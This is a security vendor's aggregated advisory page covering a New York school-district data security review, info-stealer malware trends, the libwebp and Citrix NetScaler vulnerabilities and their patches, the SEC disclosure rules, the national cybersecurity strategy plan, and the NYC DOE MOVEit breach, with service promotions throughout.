Security Updates

An aggregated collection of incoming security alerts, advisories, patches, and more so you’re prepared to respond to real-time threats.

In response to feedback received from various school districts, we have gathered the following information:

The New York State Education Department’s (NYSED) Information Security Office issued an important update impacting school districts throughout the state. Starting this spring, the NYSED Information Security Office will commence a comprehensive review of Local Education Agencies’ (LEAs) current data security controls in place to protect systems, applications, and data within school districts. The ultimate objective of this initiative is to enhance the overall security posture of LEAs in New York State.

Overview of NYSED’s LEA Data Security Review

The NYSED Information Security Office will contact LEAs to schedule virtual appointments for the data security review in January 2024. This timeframe will give LEAs enough time to review their current data security posture and ensure compliance before the review.

The regulatory frameworks guiding this assessment include Education Law § 2-d and Part 121 of the regulations of the Commissioner of Education, which outline what needs to be protected, and the NIST CSF, which provides guidance and measures to achieve a robust data security foundation. In connection with these compliance components, the review will encompass three key areas: Policies, Controls, and Third-Party Oversight. Each of these areas plays a pivotal role in safeguarding sensitive information and maintaining a secure digital environment.

Data Security Areas of Review at a Minimum

Policies

  • Acceptable Use
  • Password
  • Incident Response
  • Disaster Recovery
  • Privacy and Security

Controls

  • Multi-Factor Authentication (MFA)
  • Password Complexity
  • Users On/Off Boarding Process
  • Access Control (i.e., physical and electronic)
  • Privacy and Security Awareness Training
  • Back-ups (i.e., tested)
  • Patch Management

Third-Party Oversight

  • Type of Data Shared
  • How Data is Shared
  • Where Data is Stored
  • Access Controls on Data Sets
  • Configurations in Third-Party Environment

an infographic displaying the three areas of nysed's data security review including policies, controls, and third-party oversight

Potential Impact of the Data Security Review

In the event that questions or concerns arise during the data security review conducted for a given LEA, the NYSED Information Security Office will collaborate with the Superintendent and Data Protection Office. Together, they will formulate a plan of action to rectify and bolster any identified deficiencies.

Recommended Action Items

M.A. Polce’s cybersecurity team recommends the following proactive measures:

Review and Update Policies

  • Ensure that Acceptable Use, Password, Incident Response, Disaster Recovery, and Privacy and Security policies are up-to-date and align with industry best practices.

Enhance Security Controls

  • Strengthen MFA implementation.
  • Enforce robust password complexity standards.
  • Streamline Users On/Off Boarding Process.
  • Regularly review and update access controls.
  • Conduct Privacy and Security Awareness Training for staff.
  • Regularly test and validate backup systems.
  • Implement a robust patch management process.

Third-Party Collaboration

  • Review and document the type, manner, and location of data shared with third parties.
  • Ensure stringent access controls on data sets shared with external entities.
  • Verify and update configurations in third-party environments.

Priority Efforts to Engage

  • Collaborate with a cybersecurity services provider like M.A. Polce to conduct a comprehensive security assessment. This type of assessment will identify and address any potential gaps in your current security infrastructure.
  • Consider enrolling in an ongoing risk and compliance program, such as M.A. Polce’s Managed Risk and Compliance service, which provides a dedicated security roadmap for achieving compliance with applicable compliance frameworks and continuous strengthening of your organization’s security posture.

Preparing for the NYSED LEA Data Security Review

By proactively addressing these action items, your school district can demonstrate a commitment to data security and ensure a smooth review process by the NYSED Information Security Office. Should you require assistance implementing the proper data security controls, please do not hesitate to contact us. We are committed to supporting your school district in maintaining the highest standards of cybersecurity.

Surge in Info Stealer Malware Campaigns

Over the past year, the cybersecurity landscape has witnessed a marked surge in info stealer malware campaigns. These ongoing campaigns present an escalating threat to individuals and organizations alike. This update examines the latest trends in info stealer attacks, the role of Managed Detection and Response (MDR) services in preventing such threats, and offers practical measures for organizations to enhance their security posture.

Escalation of Info Stealer Malware

Info Stealer malware, a category designed to pilfer sensitive information from infected systems, has seen a notable uptick in sophistication and prevalence over the past year. This malware is designed to steal information from a target, such as:

  • Browser data
  • Cryptocurrency wallets
  • Saved credit card data
  • Discord tokens
  • Telegram sessions
  • System information

We’re seeing cyber adversaries adapt to modern security measures, utilizing increasingly sophisticated techniques to infiltrate networks and exfiltrate invaluable data.

Modus Operandi

  • Phishing Prowess: Malicious actors often leverage sophisticated phishing campaigns, using social engineering tactics to deceive users into revealing confidential information.
  • Fileless Attacks: Info Stealer malware has become adept at employing fileless techniques, evading traditional antivirus measures by residing in system memory.

Targets and Payloads

  • Corporate Environments: Businesses across industries have fallen victim to info stealer campaigns, with cybercriminals targeting intellectual property, proprietary information, and financial records.
  • Personal Data: Individuals are at risk as personal information, login credentials, and financial data become prime targets for exploitation.

The Crucial Role of MDR in Info Stealer Prevention

Managed Detection and Response services have become indispensable in the battle against Info Stealer malware, employing a multifaceted approach to identify, isolate, and eradicate these threats.

Continuous Monitoring

MDR services employ real-time monitoring, analyzing network and endpoint activities for anomalous patterns indicative of Info Stealer infections.

Behavioral Analytics

Utilizing advanced behavioral analytics, MDR platforms can identify deviations from normal user behavior, swiftly detecting potential Info Stealer activities.

Threat Hunting

MDR experts engage in proactive threat hunting, actively searching for signs of potential Info Stealer malware that may have evaded automated detection systems.

Endpoint Protection

MDR solutions often incorporate Endpoint Detection and Response (EDR) capabilities, allowing for quick response and containment at the endpoint level.

Threat Intelligence Integration

By leveraging threat intelligence feeds, MDR services stay updated on the latest Info Stealer variants and tactics, enhancing their ability to anticipate and respond to emerging threats.

Info Stealer Malware Preventative Beyond MDR

While MDR is a critical component of a comprehensive security strategy, individuals can take additional steps to fortify their defenses against Info Stealer malware.

Employee Training and Awareness

Conduct regular cybersecurity training sessions at your organization to educate employees about the risks associated with phishing attacks and the importance of avoiding suspicious emails and attachments.

Endpoint Security Solutions

Implement robust endpoint security solutions that include antivirus, anti-malware, and firewall protection to create multiple layers of defense against Info Stealer infections.

Regular Software Updates

Keep operating systems, applications, and security software up-to-date to patch vulnerabilities that could be exploited by Info Stealers.

Network Segmentation

Employ network segmentation to limit lateral movement within the network, reducing the potential impact of an Info Stealer infection.

Data Encryption

Implement encryption protocols to protect sensitive data, rendering it less accessible even if an Info Stealer gains unauthorized access.

The Impact of Info Stealer Malware: A Client’s Nightmare

Experiencing this type of malware can have severe consequences, including financial losses and damage to one’s reputation.

Financial Fallout

Stolen financial information can result in unauthorized transactions, leading to direct monetary losses for both individuals and businesses.

Reputational Damage

For businesses, a breach of confidential data can damage customer confidence, causing harm to the organization’s reputation, which may take a long time to recover.

Regulatory Consequences

Furthermore, regulatory bodies often impose fines and penalties for data breaches, especially when sensitive client information is compromised.

Protect Your Organization Against Info Stealer Malware

In sum, as Info Stealer malware evolves and scales, the role of MDR becomes increasingly paramount in safeguarding against these insidious threats. By embracing advanced detection mechanisms, threat intelligence integration, and rapid incident response, MDR services stand as a stalwart defense, protecting organizations from the potentially devastating impacts of Info Stealer malware.

If you want to protect your organization against sophisticated malware attacks, it’s important to partner with a reliable MDR provider. M.A. Polce provides a comprehensive suite of cybersecurity solutions, including MDR. Contact us today if you want to put the proper measures in place to protect your operations from cyber threats.

Sources

Verizon 2023 Data Breach Investigations Report
CrowdStrike 2023 Global Threat Report
SOC Prime
Cybersecurity and Infrastructure Security Agency (CISA) and FBI
Malwarebytes Labs

Overview of the libwebp Vulnerability

A zero-day vulnerability in the libwebp image library used for rendering images in WebP format is currently being exploited. Google identified it as CVE-2023-5129, with a maximum CVSS score of 10. This vulnerability was initially wrongly identified as a Chrome vulnerability (CVE-2023-4863) but has been clarified to affect all software utilizing the libwebp library.

The vulnerability is critical, affecting nearly all operating systems and applications using the libwebp library, including those built on Electron (a Cross-Platform Development Framework using Chromium and Node.js).

How the libwebp Vulnerability Works

The attack is complex and involves a specially crafted WebP lossless file that can write data beyond the heap boundaries. This potentially allows attackers further exploitation capabilities.

Top Three Reasons the libwebp Vulnerability is so Severe

The libwebp vulnerability (CVE-2023-5129) is very severe due to three reasons.

Firstly, the vulnerability affects any software that uses the WebP codec, including major browsers like Chrome, Firefox, Safari, and Edge and a host of additional apps. This makes the impact of the vulnerability extremely broad.

Secondly, successful exploitation of the vulnerability could potentially result in attackers taking control of a system, executing arbitrary code, and gaining unauthorized access to confidential user data, making the impact of exploitation extremely serious.

Lastly, attackers are already actively exploiting the flaw. Google acknowledged earlier this month that CVE-2023-4863 was being exploited in the wild. The vulnerability has also been linked to Citizen Lab’s September 7 “BLASTPASS” report disclosing a zero-click, zero-day iMessage exploit captured in the wild.

Patching the libwebp Flaw

Given the severity of the libwebp vulnerability and the active exploitation already confirmed, it’s crucial for admins to take immediate steps to safeguard their networks. One of the key measures is to patch any vulnerable apps as soon as updates become available. Then, confirm the successful application of the patches. However, since the complete list of affected applications is still unknown, it’s difficult to take preventive measures for every vulnerable app. Hopefully, additional vendors will soon share more information about the impacted applications.

Google has recommended that organizations apply patches promptly to prevent exploitation. Google Chrome versions before 116.0.5845.187 and older Electron versions are vulnerable.

Apps with available Patches for CVE-2023-5129 are listed in this ninjaOne blog.

A security professional and threat hunter, Michael Taggart has developed an extensive list of apps affected by CVE-2023-5129. Taggart is updating this list regularly.

Keep Your Network Secure with M.A. Polce

Partnering with a reliable managed IT services provider like M.A. Polce can help businesses maintain a secure network, especially when it comes to IT security services such as regular patch management and expert support. With the recent rise in zero-day security vulnerabilities like the libwebp flaw, it’s more important than ever to have a trusted partner who can provide proactive solutions to keep your business secure. M.A. Polce’s team of experts can offer a range of services that help prevent and mitigate security risks, so you can focus on what matters most – running your business. Contact us today to learn about our options for securing your business network.

Sources

https://www.ninjaone.com/blog/webp-0-day-how-to-identify-vulnerable-apps-cve-2023-5129/

https://www.bleepingcomputer.com/news/security/google-assigns-new-maximum-rated-cve-to-libwebp-bug-exploited-in-attacks/

 

The Securities and Exchange Commission (SEC) has introduced new cybersecurity disclosure requirements, referred to as the “Final Rules,” which apply to all types of SEC filers, including domestic issuers, foreign private issuers (FPIs), smaller reporting companies, and emerging growth companies. The rules were adopted on July 26, 2023, and are effective September 5, 2023. Above all, These rules aim to enhance transparency and governance in cybersecurity for public companies.

Disclosure of Material Cybersecurity Incidents (Form 8-K):

Domestic issuers must file a Current Report on Form 8-K within four business days after discovering a material cybersecurity incident. Specifically, the disclosure should include details on the incident’s nature, scope, timing, and its material impact on the issuer’s financial condition and results of operations. The definition of “cybersecurity incident” is broad, covering a series of related unauthorized occurrences. Delay in reporting is allowed only if the U.S. Attorney General determines that immediate disclosure threatens national security or public safety.

Key Takeaway on Disclosing Cyber Incidents

It is crucial for public companies to establish internal processes that can help determine whether a cybersecurity incident is material and document all the necessary facts related to the incident.

Due to disclosure timeline requirements, companies must prepare in advance to carry out these assessments and disclosures. This stands even if the cybersecurity incident is still ongoing. So, the security, legal, and corporate communication teams of public companies must work together to adapt their cyber incident response strategies and financial reporting processes to meet these obligations.

Disclosure of Material Cybersecurity Incidents (Form 6-K):

Foreign private issuers must furnish a Form 6-K to the SEC if they disclose material cybersecurity incidents in a foreign jurisdiction to stock exchanges or security holders.

Compliance Dates:

Most issuers must comply with the cybersecurity incident disclosure requirements by December 18, 2024 (or later if specified in the Federal Register). However, smaller reporting companies have an additional 180 days for compliance.

Cybersecurity Risk Management, Strategy, and Governance Disclosure (Form 10-K and 20-F):

A new Item 106 to Regulation S-K requires annual disclosures in Form 10-K and 20-F reports about cybersecurity governance, risk management, and strategy. Issuers must describe their risk management processes for cybersecurity threats and assess their impact on business strategy, results, and financial condition. Governance-related disclosures should identify board committees overseeing cybersecurity risks and describe management’s role in managing these risks.

Compliance Dates for Risk Management, Strategy, and Governance Disclosure:

All issuers, including smaller reporting companies and emerging growth companies, must comply with Item 106 starting with annual reports for fiscal years ending on or after December 15.

Disclosures in Inline eXtensible Business Reporting Language (XBRL):

New disclosure requirements must be tagged in XBRL format starting on December 18, 2024 (or later if specified in the Federal Register).

Action Items for Companies:

  • Board discussions on the new disclosure requirements and cybersecurity updates.
  • Develop or enhance strategies, policies, and procedures for managing and mitigating cybersecurity risks.
  • Regularly assess and update cybersecurity policies and procedures to align with industry standards.

These new SEC cybersecurity disclosure requirements aim to bolster transparency, governance, and preparedness in addressing cybersecurity risks for public companies. The adoption of these new rules could signal that greater federal cybersecurity enforcement actions are imminent. Consequently, this could mean that corporate leaders can expect to face increased personal liability and regulatory scrutiny risks. Thus, it is essential for affected companies to take proactive steps to ensure compliance and strengthen their cybersecurity practices.

How M.A. Polce Can Help

The SEC’s new cybersecurity disclosure requirements raise the stakes for business leaders. As a trusted IT security company, M.A. Polce can assist businesses impacted by the new SEC cybersecurity disclosure requirements. Our team can conduct thorough cybersecurity assessments, develop robust incident response plans, establish effective risk management processes, and enhance governance structures to ensure compliance. We offer comprehensive cybersecurity solutions including technical defenses and continuous monitoring. Additionally, we can provide tailored training and awareness programs for your staff and board members. Take proactive steps to strengthen your cybersecurity posture and meet SEC requirements by partnering with M.A. Polce. Contact us today to ensure your business is well-prepared to address evolving cybersecurity expectations.

Overview of CVE-2023-3519 Vulnerability

A recent Citrix alert warns of multiple vulnerabilities impacting Citrix Netscaler AD and NetScaler Gateway products. Of those vulnerabilities, only CVE-2023-3519 is of critical severity, with a CVSS score of 9.8. CVE-2023-3519 is an unauthenticated remote code execution (RCE) vulnerability that is now being exposed in the wild and could potentially affect multiple versions of Citrix.

Given that CVE-2023-3519 allows threat actors to drop a web shell in an environment, the vulnerability provides specific access to perform discovery, exfiltration, and other follow-on activity. There is now a patch available through Citrix to mitigate the threat.

What Appliance Versions Does CVE-2023-3519 Affect?

According to CISA, only those appliances set up as a Gateway (whether it is VPN virtual server, ICA Proxy, CVPN, or RDP Proxy) or as an AAA (authentication, authorization, and auditing) virtual server are vulnerable to exploitation.

The NetScaler ADC and NetScaler Gateway versions impacted by the vulnerability include the following:

  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
  • NetScaler ADC and NetScaler Gateway version 12.1, now end of life
  • NetScaler ADC 13.1-FIPS before 13.1-37.159
  • NetScaler ADC 12.1-FIPS before 12.1-65.36
  • NetScaler ADC 12.1-NDcPP before 12.65.36

 
Installing the following software versions as soon as possible is essential to mitigate the vulnerability within your environment. You can follow the steps outlined in Citrix’s Security Bulletin.

What Software Versions Mitigate the CVE-2023-3519 Vulnerability?

  • The software versions needed to mitigate the vulnerability include:
  • NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases
  • NetScaler ADC and NetScaler Gateway 13.0-91.13  and later releases of 13.0
  • NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS
  • NetScaler ADC 12.1-FIPS 12.1-55.297 and later releases of 12.1-FIPS
  • NetScaler ADC 12.1-NDcPP 12.1-55.297 and later releases of 12.1-NDcPP

 
Citrix is notifying customers and channel partners about this potential security issue through its security bulletin on the Citrix Knowledge Center at https://support.citrix.com/securitybulletins.

Managing the Security of Your Applications

If your organization could use assistance managing the security of its IT devices and applications, contact M.A. Polce today. M.A. Polce is a leading provider of managed IT and cybersecurity services in New York State. By outsourcing technology tasks to a company like M.A. Polce, your organization can focus on core business objectives while ensuring its security is modern and comprehensive.

Sources

https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467?utm_campaign=2023_threat_updates&utm_medium=email&_hsmi=267255091&_hsenc=p2ANqtz–XCzQw_EcwewFKrfzNtGrGLQfscdyGxkxp4dUFJBZhssCuY94HRgiRfPbeE616lUbJnVtWUHe1-jKduUKo9yikbd5OLQ&utm_content=267255091&utm_source=hs_email

https://thehackernews.com/2023/07/zero-day-attacks-exploited-critical.html

 

Overview: A Roadmap for the National Cybersecurity Strategy

The White House released its implementation plan for the National Cybersecurity Strategy (the Strategy) unveiled in March 2023. The plan provides a roadmap outlining how the Nation will achieve the President’s vision for cyber resilience in America.

Overall, the primary purpose of the publication is to pave the path for achieving two significant shifts: more capable actors in cyberspace to bear more of the responsibility for cybersecurity and increased incentives to make investments in long-term resilience. In other words, it serves to help secure cyberspace and ensure that the United States can fully benefit from its digital future.

As the first iteration of the Implementation Plan, it’s a living document meant to be updated in concert with the evolving cyber landscape.

The National Cybersecurity Strategy

The Strategy, consisting of five pillars and 27 strategic objectives, addresses the importance of cybersecurity and how it impacts various aspects of American life, such as the economy, critical infrastructure, democracy, privacy, and national defense. Additionally, it emphasizes the need for collaboration between the public and private sectors to achieve effective and equitable cybersecurity. It also aims to shift responsibility from individual users and small organizations to encourage long-term investments in security and resilience.

What are the Main Components of the Implementation Plan?

In alignment with the Strategy, the 57-page Implementation Plan comprises details for the Strategy’s five key pillars and related strategic objectives and sub-initiatives. All of which provide a means to achieve a wide range of goals for the future of cybersecurity in America. The plan comes with more than 65 initiatives assigned to 18 federal agencies with timelines for completion.

Pillar One: Defend Critical Infrastructure

To begin, Pillar One consists of five strategic objectives, including 16 sub-initiatives. Overall, it focuses on the universal implementation of baseline configurations, the development of Incident Response Plans and Processes, and the implementation of federal cybersecurity centers.

Strategic Objective 1.1: Establish Cybersecurity Requirements to Support National Security and Public Safety

  • Strategic Initiative 1.1.1: Establish an initiative on cyber regulatory harmonization
  • Strategic Initiative 1.1.2: Set cybersecurity requirements across critical infrastructure sectors
  • Strategic Initiative 1.1.3: Increase agency use of frameworks and international standards to inform regulatory alignment

 

Strategic Objective 1.2: Scale Public-Private Collaboration

  • Strategic Initiative 1.2.1: Scale public-private partnerships to drive development and adoption of secure-by-design and secure-by-default technology
  • Strategic Initiative 1.2.2: Provide recommendations for the designation of critical infrastructure sectors and SRMAs
  • Strategic Initiative 1.2.3: Evaluate how CISA can leverage existing reporting mechanisms or the potential creation of a single portal to integrate and operationalize SRMAs’ sector-specific systems and processes
  • Strategic Initiative 1.2.4: Investigate opportunities for new and improved information-sharing and collaboration platforms, processes, and mechanisms.
  • Strategic Initiative 1.2.5: Establish an SRMA support capability

 

Strategic Objective 1.3: Integrate Federal Cybersecurity Centers

  • Strategic Initiative 1.3.1: Assess and improve Federal Cybersecurity Centers’ and related cyber centers’ capabilities and plans necessary for collaboration at speed and scale.

 

Strategic Objective 1.4: Update Federal Incident Response Plans and Processes

  • Strategic Initiative 1.4.1: Update the National Cyber Incident Response Plan (NCIRP)
  • Strategic Initiative 1.4.2: Issue final Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) rule
  • Strategic Initiative 1.4.3: Develop exercise scenarios to improve cyber incident response
  • Strategic Initiative 1.4.4: Draft legislation to codify the Cyber Safety Review Board (CSRB) with the required authorities

 

Strategic Objective 1.5: Modernize Federal Defenses

  • Strategic Initiative 1.5.1: Secure unclassified Federal Civilian Executive Branch (FCEB) systems
  • Strategic Initiative 1.5.2: Modernize Federal Civilian Executive Branch (FCEB) technology
  • Strategic Initiative 1.5.3: Secure National Security Systems (NSS) at Federal Civilian Executive Branch (FCEB) agencies

 

Pillar Two: Disrupt and Dismantle Threat Actors

Next, Pillar Two consists of five strategic objectives and 14 strategic sub-initiatives. In all, this pillar aims to strengthen the National Cyber Investigative Joint Task Force’s capacity and expand other organizations that may coincide. Furthermore, it acknowledges that with increased power comes the responsibility to take down threat actors and support organizations that fall victim to ransomware or other cybercrimes.

Strategic Objective 2.1: Integrate Federal Disruption Activities

  • Strategic Initiative 2.1.1: Publish an updated DOD Cyber Strategy
  • Strategic Initiative 2.1.2: Strengthen the National Cyber Investigative Joint Task Force (NCIJTF) capacity
  • Strategic Initiative 2.1.3: Expand organizational platforms dedicated to disruption campaigns
  • Strategic Initiative 2.1.4: Propose legislation to disrupt and deter cybercrime and cyber-enabled crime
  • Strategic Initiative 2.1.5: Increase speed and scale of disruption operations

 

Strategic Objective 2.2: Enhance Public-Private Operational Collaboration to Disrupt Adversaries

  • Strategic Initiative 2.2.1: Identify mechanisms for increased adversarial disruption through public-private operational collaboration

 

Strategic Objective 2.3: Increase the Speed and Scale of Intelligence Sharing and Victim Notifications

  • Strategic Initiative 2.3.1: Identify and operationalize sector-specific intelligence needs and priorities.
  • Strategic Initiative 2.3.2: Remove barriers to delivering cyber threat intelligence and data to critical infrastructure owners and operators

 

Strategic Objective 2.4: Prevent Abuse of U.S.-Based Infrastructure

  • Strategic Initiative 2.4.1: Publish a Notice of Proposed Rulemaking on requirements, standards, and procedures for Infrastructure-as-a-Service (IaaS) providers and resellers

 

Strategic Objective 2.5: Counter Cybercrime, Defeat Ransomware

  • Strategic Initiative 2.5.1: Disincentivize safe havens for ransomware criminals
  • Strategic Initiative 2.5.2: Disrupt ransomware crimes
  • Strategic Initiative 2.5.3: Investigate ransomware crimes and disrupt the ransomware ecosystem.
  • Strategic Initiative 2.5.4: Support Private sector and state, local, Tribal, and territorial (SLTT) efforts to mitigate ransomware risk.
  • Strategic Initiative 2.5.5: Support other countries’ efforts to adopt and implement the global anti-money laundering/countering the financing of terrorism (AML/CFT) standards for virtual asset service providers.

 

Pillar Three: Shape Market Forces to Drive Security and Resilience

Thirdly, Pillar Three comprises five strategic objectives and 11 strategic sub-initiatives. This portion of the plan prioritizes the security of devices and services but also holds accountability for the risk they might present. By using federal grants and other incentives, developers will prioritize security in the first step of a product rather than once it has been released. Additionally, Pillar Three highlights the importance of Cyber Liability Insurance for a catastrophic cyber event.

Strategic Objective 3.2: Drive the Development of Secure IoT Devices

  • Strategic Initiative 3.2.1: Implement Federal Acquisition Regulation (FAR) requirements per the Internet of Things (IoT) Cybersecurity Improvement Act of 2020
  • Strategic Initiative 3.2.2: Initiate a U.S. Government IoT security labeling program

 

Strategic Objective 3.3: Shift Liability for Insecure Software Products and Services

  • Strategic Initiative 3.3.1: Explore approaches to develop a long-term, flexible, and enduring software liability framework
  • Strategic Initiative 3.3.2: Advance software bill of materials (SBOM) and mitigate the risk of unsupported software
  • Strategic Initiative 3.3.3: Coordinated vulnerability disclosure

 

Strategic Objective 3.4: Use Federal Grants and Other Incentives to Build in Security

  • Strategic Initiative 3.4.1: Leverage Federal grants to improve infrastructure cybersecurity
  • Strategic Initiative 3.4.2: Prioritize funding for cybersecurity research
  • Strategic Initiative 3.4.3: Prioritize cybersecurity research, development, and demonstration on social, behavioral, and economic research in cybersecurity

 

Strategic Objective 3.5: Leverage Federal Procurement to Improve Accountability

  • Strategic Initiative 3.5.1: Implement Federal Acquisition Regulation (FAR) changes required under EO 14028
  • Strategic Initiative 3.5.2: Leverage the False Claims Act to improve vendor cybersecurity

 

Strategic Objective 3.6: Explore a Federal Cyber Insurance Backstop

  • Strategic Initiative 3.6.1: Assess the need for a federal insurance response to a catastrophic cyber event

 

Pillar Four: Invest in a Resilient Future

Then, Pillar Four entails five strategic objectives and 13 strategic sub-initiatives. It sets the tone for what the future holds in terms of strategy and security by developing network security best practices and building training, tools, and support for engineers and technicians using cyber-informed engineering principles.

Strategic Objective 4.1: Secure the Technical Foundation of the Internet

  • Strategic Initiative 4.1.1: Lead the adoption of network security best practices
  • Strategic Initiative 4.1.2: Promote open-source software security and the adoption of memory safe programming languages
  • Strategic Initiative 4.1.3: Accelerate the development, standardization, and adoption of foundational Internet infrastructure capabilities and technologies
  • Strategic Initiative 4.1.4: Accelerate the development and standardization, and support the adoption, of foundational internet infrastructure capabilities and technologies
  • Strategic Initiative 4.1.5: Collaborate with key stakeholders to drive secure Internet routing

 

Strategic Objective 4.2: Reinvigorate Federal Research and Development for Cybersecurity

  • Strategic Initiative 4.2.1: Accelerate maturity, adoption, and security of memory-safe programming languages

 

Strategic Objective 4.3: Prepare for Our Post-Quantum Future

  • Strategic Initiative 4.3.1: Implement National Security Memorandum-10
  • Strategic Initiative 4.3.2: Implement NMS-10 for National Security Systems (NSS)
  • Strategic Initiative 4.3.3: Standardize, and support the transition to, post-quantum cryptography algorithms.

 

Strategic Objective 4.4: Secure Our Clean Energy Future

  • Strategic Initiative 4.4.1: Drive adoption of cyber secure-by-design principles by incorporating them into Federal projects
  • Strategic Initiative 4.4.2: Develop a plan to ensure the digital ecosystem can support and deliver the U.S. Government’s decarbonization goals
  • Strategic Initiative 4.4.3: Build and refine training, tools, and support for engineers and technicians using cyber-informed engineering principles

 

Strategic Objective 4.6: Develop a National Strategy to Strengthen Our Cyber Workforce

  • Strategic Initiative 4.6.1: Publish a National Cyber Workforce and Education Strategy and track its implementation

 

Pillar Five: Forge International Partnerships to Pursue Shared Goals

Finally, Pillar Five includes five strategic objectives with 12 strategic sub-initiatives. Simply put, this pillar promotes collaboration with other countries and allied partners to advance common cybersecurity interests. In effect, these partnerships can establish weaknesses, strengthen the international partner’s cyber capacity, and promote a more diverse and resilient supply chain of trustworthy information and communication vendors.

Strategic Objective 5.1: Build Coalitions to Counter Threats to our Digital Ecosystem

  • Strategic Initiative 5.1.1: Create interagency teams for regional cyber collaboration and coordination
  • Strategic Initiative 5.1.2: Publish an International Cyberspace and Digital Policy Strategy
  • Strategic Initiative 5.1.3: Strengthen Federal law enforcement collaboration mechanisms with allies and partners
  • Strategic Initiative 5.1.4: Regional cyber hubs study

 

Strategic Objective 5.2: Strengthen International Partner Capacity

  • Strategic Initiative 5.2.1: Strengthen international partners’ cyber capacity
  • Strategic Initiative 5.2.2: Expand international partners’ cyber capacity through operational law enforcement collaboration

 

Strategic Objective 5.3: Expand U.S. Ability to Assist Allies and Partners

  • Strategic Initiative 5.3.1: Establish flexible foreign assistance mechanisms to provide cyber incident response support quickly

 

Strategic Objective 5.4: Build Coalitions to Reinforce Global Norms of Responsible State Behavior

  • Strategic Initiative 5.4.1: Hold irresponsible states accountable when they fail to uphold their commitments

 

Strategic Objective 5.5: Secure Global Supply Chains for Information, Communications, and Operational Technology Products and Services

  • Strategic Initiative 5.5.1: Promote the development of secure and trustworthy information and communication technology (ICT) networks and services
  • Strategic Initiative 5.5.2: Promote a more diverse and resilient supply chain of trustworthy information and communication (ICT) vendors
  • Strategic Initiative 5.5.3: Begin administering the Public Wireless Supply Chain Innovation Fund (PWSCIF)
  • Strategic Initiative 5.5.4: Promulgate and amplify Cybersecurity Supply Chain Risk Management (C-SCRM) key practices across and within critical infrastructure sectors

 

Implementation-wide Initiatives

Lastly, a sixth component of the plan highlights the effectiveness of reviewing progress and applying lessons learned throughout the implementation of the National Cybersecurity Strategy roadmap.

Implementation 6.1: Assessing Effectiveness

  • Initiative 6.1.1: Report progress and effectiveness on implementing the National Cybersecurity Strategy
  • Initiative 6.1.2: Apply lessons learned to the National Cybersecurity Strategy implementation
  • Initiative 6.1.3: Align budgetary guidance with National Cybersecurity Strategy implementation.

 

What Does the Implementation Plan Mean for Other Organizations?

The release of the National Cybersecurity Strategy Implementation Plan by the White House has significant implications for commercial businesses, state and local governments, school districts, and other organizations in the United States. This plan outlines the government’s strategy and actions to strengthen the nation’s cybersecurity defenses and protect critical infrastructure from cyber threats.

The release of the National Cybersecurity Strategy Implementation Plan should be of great importance to all organizations because:

  • Improved Cybersecurity Defense: The plan outlines strategies to enhance the nation’s cybersecurity capabilities, which will benefit organizations by providing a safer digital environment.
  • Regulatory Compliance: Organizations may need to comply with new cybersecurity regulations resulting from the implementation plan, which could impact their operations and reputations.
  • Collaborative Approach: Organizations that participate in public-private partnerships may gain access to valuable threat intelligence and resources to bolster their cybersecurity defenses.
  • Protection of Critical Infrastructure: The plan’s focus on protecting critical infrastructure helps ensure the continuity of essential services during cyber incidents.

 
Ultimately, the release of the National Cybersecurity Strategy Implementation Plan reflects the government’s commitment to addressing cyber threats at a national level. In light of this historical development, organizations should closely monitor its impact on their industries and be prepared to adapt their cybersecurity practices to align with the evolving strategies and initiatives set forth by the plan.

To review the National Cybersecurity Strategy Implementation Plan in greater detail, click here.

How to Address Cybersecurity at Your Organization

Are you prepared to fortify your organization’s cybersecurity defenses in alignment with the United States’ National Cybersecurity Strategy Implementation Plan? Protect your business from cyber threats and embrace proactive measures to safeguard your digital assets. Contact M.A. Polce today and secure your organization’s future with our expert cybersecurity solutions.

At M.A. Polce, we understand the critical importance of staying ahead of cyber adversaries in this rapidly evolving landscape. Our tailored cybersecurity services are designed to meet the unique needs of businesses like yours. With the White House’s focus on national cybersecurity, it’s the ideal time to ensure your organization is equipped to face any cyber challenge.

Let our team of certified experts assess your current security posture, identify vulnerabilities, and implement robust defenses. By partnering with M.A. Polce, you’ll gain access to industry-leading cybersecurity strategies and cutting-edge technologies to protect your valuable data and maintain your reputation.

Don’t wait for cyber threats to strike. Reach out to M.A. Polce today and join us in building a safer and more resilient digital ecosystem for your organization. Together, we’ll navigate the complexities of cybersecurity and create a stronger, more secure future for your business.

 

Overview of NYC DOE MOVEit Data Breach

MOVEit is a file-sharing software that private companies and government sectors use to transfer documents and data safely. However, it was recently hacked and leaked data of almost 45,000 students in New York City and millions worldwide.

The released information includes social security numbers, OSIS numbers, dates of birth, and even employee IDs. Some documentation also includes student evaluations and related services progress reports, Medicaid reports for students receiving services, and internal records related to DOE employees’ leave statuses.

The amount of data per person that was leaked varies. But, city officials said they would notify those with compromised data on an unspecified date this summer.

The NYC Department of Education’s Response

On a Sunday following the end of the school year, the New York City Department of Education released a statement about the attack.

“The safety and security of our students and staff, including their personal information and data, is of the utmost importance for the New York City Department of Education. Our top priority is determining exactly which confidential information was exposed and the specific impact for each affected individual,” the department said.

As the release of sensitive information positions victims to be subject to fraudulent activity, the DOE has offered victims access to an identity monitoring service.

After discovering it, the NYC DOE patched the flaw and took their servers offline. Corresponding with those efforts, the NYC DOE is working with NYC Cyber Command to respond to the incident. Additionally, the DOE is cooperating with local and federal law enforcement agencies to investigate the incident.

Who is responsible for the MOVEit ransomware attack on the DOE?

Sources suspect the attack was conducted by CL0P, a ransomware gang with pro-Russian ties. In fact, the gang has claimed responsibility for the MOVEit data-theft attacks in a statement shared directly with BleepingComputer in early June 2023.

A noteworthy story component is that CL0P threat actors did not immediately use the data to extort any NYC DOE victims after obtaining the data. At this point, the CL0P has not published any DOE information. The group also has not threatened to or demanded payment. Likely, the group is still sifting through the files to determine what is most valuable to them.

Other MOVEit Data Breaches

The NYC DOE breach is merely an addition to the already extensive list of breaches the gang has carried out. Compared to the other organizations affected by the same file transfer software breach, the scale of NYC DOE is relatively small. But, what’s most notable about this case is the involvement of the personal information of minors.

